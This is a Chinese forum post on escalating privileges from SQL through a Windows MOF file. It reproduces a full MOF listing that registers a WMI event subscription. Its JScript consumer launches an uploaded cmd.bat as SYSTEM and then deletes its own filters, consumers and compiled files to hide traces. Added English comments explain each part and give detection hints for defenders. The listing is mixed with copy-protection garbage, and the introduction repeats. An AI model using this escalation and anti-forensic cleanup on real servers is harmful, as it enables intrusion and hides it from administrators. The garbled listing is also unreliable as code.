这个sql提权MOF需要运行 system下的文件,不能定义路径。
需要将要运行的命令写入到bat上传到system32目录,然后执行。
S- p" _8 b! K! M# f
这个sql提权MOF需要运行 system下的文件,不能定义路径。
需要将要运行的命令写入到bat上传到system32目录,然后执行。
// Review note: this MOF registers a permanent WMI event subscription in root\cimv2
// (__EventFilter + ActiveScriptEventConsumer + __FilterToConsumerBinding) whose JScript
// consumer launches cmd.bat, then removes its own filter/consumer/class and the compiled
// .mof under wbem\mof\good. The listing is interleaved with forum copy-protection noise and
// appears not to be compilable as pasted; it is kept byte-identical here.
// Detection angle: creation of __EventFilter / __EventConsumer / __FilterToConsumerBinding
// instances (e.g. Sysmon WmiEvent IDs 19-21) and unexpected files appearing under
// %SystemRoot%\System32\wbem\mof.
/ h4 }" `% T6 E7 a. P1 n/ E1 I. y#pragma
% ?6 d/ Y9 V5 ^ namespace("\\\\.\\root\\cimv2")
// MyClass547: a throwaway class whose instance creation (see the end of the file) is the trigger event.
) E; C5 B8 W5 z class
9 X w+ Y; E( s1 d MyClass547. u. E ]2 `4 L( n
{ [key]7 ^9 a) i! X, q; r( [2 t9 P
string
* c( ]# P1 g" z" b$ E' P; Q Name;
# ]2 q+ O4 x5 B5 j };
// Redeclares the ActiveScriptEventConsumer class (ScriptingEngine/ScriptText are what the instances below set).
, n5 ^( K ?8 w* H" c+ j class
) M- C' E* B2 v! L: ?# x) x ActiveScriptEventConsumer7 V, N3 A! j& q( s
: __EventConsumer { [key]3 y7 t1 r7 E& K8 [, x. p/ n& q
string
6 X6 {7 K; b, Q; O! S0 V Name; [not_null]
5 V! X/ B5 D$ P. T3 F& g string
) q# [1 _; M( o+ m0 O8 P7 _- c ScriptingEngine; string
; c8 n8 s6 E2 ]% P% E; b8 S7 s ScriptFileName; [template]
, ?! h. H) t2 R# T string2 f! u' S5 K7 B* M+ \' V$ f6 H
ScriptText; uint32 KillTimeout;
// $P: registers the ActiveScriptEventConsumer provider by CLSID so the script consumers below are serviced.
2 k3 w; \: S6 X, S8 g& r) R }; instance of __Win32Provider as $P {
6 x( I0 d2 {- Q1 ?* J Name. s/ N; j1 Q1 g! d1 F! P9 G
=
: s* Y7 J L+ @4 ^; C "ActiveScriptEventConsumer"; CLSID =9 y1 S# F& n: z0 p* g3 b( g
"{266c72e7-62e8-11d1-ad89-00c04fd8fdff}";# b4 J( v6 U$ ~' \) r
PerUserInitialization+ A) _5 c h+ U
= TRUE;
/ }, A" o! g; i' j }; instance of __EventConsumerProviderRegistration { Provider
+ i1 D( j5 ?' R- `9 i = $P; ConsumerClassNames
% z2 v* ]7 W6 w0 y3 V8 M =) W+ ^* D+ D! p, C. U' b. z! I
{"ActiveScriptEventConsumer"};5 E3 V9 H2 C7 F1 G
};
// $cons ("ASEC"): on trigger, runs cmd.bat via WScript.Shell, then deletes MyClass547,
// the 'instfilt' filter and itself from root\cimv2 (self-cleanup; every step is wrapped in try/catch).
: ^0 ], M8 {0 W( X& P$ E, g5 ?' j Instance of ActiveScriptEventConsumer
3 u L) ~1 o1 {; |! j4 K' u, C as $cons { Name0 M; s9 V, t. V9 a4 ^
=
' [2 N# B0 ?! V/ Z$ E "ASEC"; ScriptingEngine" z5 N7 C* R# e/ O% g
=+ ~! r/ {" r8 w" }+ P u+ m4 o
"JScript"; ScriptText9 R4 I5 M p# L1 _- r( u+ x0 d
=
5 [: A& K% {2 M8 y* V# W9 S "\ntry {var s = new ActiveXObject(\"Wscript.Shell\");\ns.Run(\"cmd.bat\");} catch (err) {};\nsv = GetObject(\"winmgmts:root\\\\cimv2\");try {sv.Delete(\"MyClass547\");} catch (err) {};try {sv.Delete(\"__EventFilter.Name='instfilt'\");} catch (err) {};try {sv.Delete(\"ActiveScriptEventConsumer.Name='ASEC'\");} catch(err) {};"; };
// $cons2 ("qndASEC"): second-stage cleanup - deletes the compiled copy of this file
// (wbem\mof\good\hBsBa.mof), cmd.bat, the 'qndfilt' filter and itself.
& Y, a/ `0 F4 q Instance of ActiveScriptEventConsumer0 K( \" L& K' |4 d# n7 E. e
as $cons2 { Name
6 j2 g* N4 U+ [1 C5 S7 D- \ =" u; p8 m% ]; u1 h; r) R
"qndASEC"; ScriptingEngine: A# Y5 x; H) T6 W& |
=
$ [, P3 v- t0 J; a* V. I "JScript"; ScriptText2 P8 L) D9 N8 Q7 G! O2 }
=
1 N) x6 \1 ?* D' Z) [ "\nvar objfs = new ActiveXObject(\"Scripting.FileSystemObject\");\ntry {var f1 = objfs.GetFile(\"wbem\\\\mof\\\\good\\\\hBsBa.mof\");\nf1.Delete(true);} catch(err) {};\ntry {\nvar f2 = objfs.GetFile(\"cmd.bat\");\nf2.Delete(true);\nvar s = GetObject(\"winmgmts:root\\\\cimv2\");s.Delete(\"__EventFilter.Name='qndfilt'\");s.Delete(\"ActiveScriptEventConsumer.Name='qndASEC'\");\n} catch(err) {};";' O7 r0 n2 F/ V' |1 B: a1 M) G
// $Filt ("instfilt"): fires on creation of any MyClass547 instance - i.e. when the $MyClass instance at the end of this file is compiled in.
}; instance of __EventFilter as $Filt { Name" z7 m0 R" z }- R
=
- X3 j/ T2 z7 v0 I9 ]+ W2 b, j, |: m "instfilt"; Query$ T( Y' a3 K8 F( w: Q1 w/ k
=% j% V* f8 u9 W) O8 ?8 X
"SELECT * FROM __InstanceCreationEvent WHERE TargetInstance.__class = \"MyClass547\""; QueryLanguage3 V: t% K/ h( l$ U; W) u8 f
= C( G. P+ K' z& t" L; [3 s
// $Filt2 ("qndfilt"): polls every 1s for deletion of a Win32_Process whose Name is "cmd.bat", which drives the $cons2 cleanup.
"WQL"; }; instance of __EventFilter as $Filt2 { Name4 N3 {9 i0 m: E4 N+ M
=8 E! @6 E8 S: Q) K
"qndfilt"; Query5 ]7 r$ Q4 e1 p* ?8 _' V- x0 O
=* c3 P `& ]3 _6 a/ }6 M$ p
"SELECT * FROM __InstanceDeletionEvent WITHIN 1 WHERE TargetInstance ISA \"Win32_Process\" AND TargetInstance.Name = \"cmd.bat\""; QueryLanguage
7 C3 T; P4 H2 U = B: Q8 J" L& M
// Bindings: $Filt -> $cons, $Filt2 -> $cons2. The binding instances are the most reliable artifact to hunt for.
"WQL"; }; instance of __FilterToConsumerBinding as $bind { Consumer& a Q9 ^$ r& Y: w6 b
= $cons; Filter
" H% S; N2 M _; X8 `" ^- M; Q" Y' I = $Filt;, J$ I4 A, U; R
}; instance of __FilterToConsumerBinding as $bind2 { Consumer
4 u2 y$ C8 _* Z4 V/ @ = $cons2; Filter( ?( b7 k- M/ r) X8 E' L5 a
= $Filt2;
// $MyClass: creating this instance is the __InstanceCreationEvent that $Filt matches, so compiling the file is what triggers $cons.
0 N# \# R( O" L5 C6 | }; instance of MyClass5477 x9 }, o9 O$ C9 C- I) ~) w \- o% H
as $MyClass { Name* e n1 g. R% E1 s7 K9 w
=
& I+ i4 ~3 O4 d) w' R "ClassConsumer";
1 l3 W* Y, l, m8 @ }; |